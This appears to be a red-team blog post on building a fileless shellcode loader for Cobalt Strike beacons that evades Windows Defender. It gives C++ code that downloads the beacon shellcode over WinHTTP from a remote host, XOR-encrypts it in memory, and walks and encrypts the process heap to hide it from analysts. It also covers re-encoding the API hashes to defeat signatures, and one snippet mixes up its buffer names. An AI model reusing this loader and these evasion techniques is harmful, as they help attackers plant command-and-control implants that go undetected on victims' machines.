Recently I was developing a simple Shellcode Loader which uses Callbacks as an alternative of Shellcode execution. While it bypasses every runtime scanning, it failed to bypass the signature detection. So I fired up ThreatCheck to identify the bad bytes:
At a first glance, it is impossible to understand what exactly is getting detected so I fired up GHidra to manually identify these bad bytes. I simply copied a random pattern from the ThreadCheck (00 1F CC 07 00 15 CC 07) and tried searching in the memeory of the compiled EXE of the malware.
This is clearly the XORed Shellcode I implemented to my Shellcode Loader and it’s getting detected as a Cobalt Strike agent by Defender. Seems like the XOR encryption routine is not strong enough againts static detection and that got me thinking: are stored shellcodes really dead (especially the ones generated from Cobalt Strike)? I wouldn’t be suprised, as currently Cobalt Strike is the most popular C2 framework among threat actors, but something must be done to make the Shellcode great and undetectable again.
RAW Shellcodes: What’s wrong with them?
Cobalt Strike’s payloads are based on Meterpreter shellcodes and include many similarities (sometimes identical) API hashing (x86 and x64 versions).
The default Hashes that Cobalt Strike uses are highly signatured; we can get a workaround to such hashes by performing a dynamic Hash encoding. If you look at the image below, the hash value 0xa779563a
is the default hash of InternetOpenA. If you simply google the hash, everything related to Metaploit will show up, so this hash is known to be mostly used by Cobalt Strike beacons and Meterpreter agents. Applying ror13 hashing to such hashes will drastically reduce the detection by AV vendors (to almost 0). As this is already nicely explain on this article, I’m not going to explain it much further, but the photo below gives the idea of the final result after encoding the hashes.
Fileless Shellcode to the rescue
Although it is not a new thing, fileless shellcodes are a good way of avoiding signature detection is by retrieving a shellcode from the internet. This way you will solve the problem of large entropy and any possible signature detection. On the photo below, there is a comparison between a traditional XORed encrypted shellcode and our fileless shellcode loader. Since the shellcode doesn’t have to be stored on .text section, the entropy will descrease drastically (remember that ):
The full source code can be found here, but on this article I will try to break down the code for the sake of understanding.
In order to request the shellcode from the HTTP Server, I will be using winhttp
library. Alternatively you can use sockets, based on some researches it might be a better solution which might results on lower runtime detection (as probably the Winsocket’s API will get hooked). The code below is responsible for sending an HTTP request to the remote server and waiting for the response:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
// Initialize WinHTTP
hInternet = WinHttpOpen(NULL, WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
// Connect to the HTTP server
hHttpSession = WinHttpConnect(hInternet, L"192.168.0.60", 80, 0); //192.168.0.60:8081
// Open an HTTP request
hHttpRequest = WinHttpOpenRequest(hHttpSession, L"GET", L"/beacon.bin", NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, 0);
// Send a request
bResults = WinHttpSendRequest(hHttpRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0, WINHTTP_NO_REQUEST_DATA, 0, 0, 0);
// Wait for the response
bResults = WinHttpReceiveResponse(hHttpRequest, NULL);
WinHTTP receives the response in chunks, so we need to make a loop untill everything is retrieved:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
do
{
dwSize = 0;
if (!WinHttpQueryDataAvailable(hHttpRequest, &dwSize))
{
printf("Error %u in WinHttpQueryDataAvailable.\n", GetLastError());
}
// Allocate space for the buffer.
pszOutBuffer = new char[dwSize + 1];
// No more available data
if (!pszOutBuffer) {
printf("[-] No more available data");
dwSize = 0;
}
// Read the Data.
ZeroMemory(pszOutBuffer, dwSize + 1);
if (!WinHttpReadData(hHttpRequest, (LPVOID)pszOutBuffer,
dwSize, &dwDownloaded))
printf("Error %u in WinHttpReadData.\n", GetLastError());
else
PEbuf.insert(PEbuf.end(), pszOutBuffer, pszOutBuffer + dwDownloaded);
} while (dwSize > 0);
Lastly, make sure to store each chunk in a vectored array:
1
2
3
4
char* PE = (char*)malloc(PEbuf.size());
for (int i = 0; i < PEbuf.size(); i++) {
PE[i] = PEbuf[i];
}
There is always place for encryption
Notice the following part:
1
2
3
4
char* PE = (char*)malloc(PEbuf.size());
for (int i = 0; i < PEbuf.size(); i++) {
PE[i] = PEbuf[i];
}
The shellcode retrieve from the teamserver is stored in the heap, making it easy for the blue-team to analyze the heap and discover what’s inside (clearly our unencrypted shellcode):
Additionally, encrypting the shellcode in Heap is always a better idea:
1
2
3
4
5
6
char* PE = (char*)malloc(PEbuffer.size());
for (int i = 0; i < PEbuf.size(); i++) {
PE[i] = PEbuffer[i] ^ 0x7e; //XOR encrypted
}
XOR(PE, PEbuffer.size(), key);
Where XOR is a basic function which decrypts the array:
1
2
3
4
5
void XOR(char* data, int len, unsigned char key) {
int i;
for (i = 0; i < len; i++)
data[i] ^= key;
}
Protect the heap at all cost
Encrypting the heap is a good idea because it protects sensitive data that could be stored in the heap. This is especially important when a program is running in an untrusted environment, as any data stored in the heap could be analyzed by a malware analyser.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
// Encryption Key
const char key[2] = "A";
size_t keySize = sizeof(key);
void xor_bidirectional_encode(const char* key, const size_t keyLength, char* buffer, const size_t length) {
for (size_t i = 0; i < length; ++i) {
buffer[i] ^= key[i % keyLength];
}
}
PROCESS_HEAP_ENTRY entry;
void HeapEncryptDecrypt() {
SecureZeroMemory(&entry, sizeof(entry));
while (HeapWalk(GetProcessHeap(), &entry)) {
if ((entry.wFlags & PROCESS_HEAP_ENTRY_BUSY) != 0) {
xor_bidirectional_encode(key, keySize, (char*)(entry.lpData), entry.cbData);
}
}
}
The HeapWalk() function is used to iterate through each heap entry in the process heap, and it is used to check whether the entry is busy. If it is busy, the xor_bidirectional_encode() function is used to encrypt and decrypt the entry. This is done by using the XOR operation to encrypt and decrypt the data.
Profit
- Entropy is drastically reduced.
- Heap is protected
- No detection (Profit!)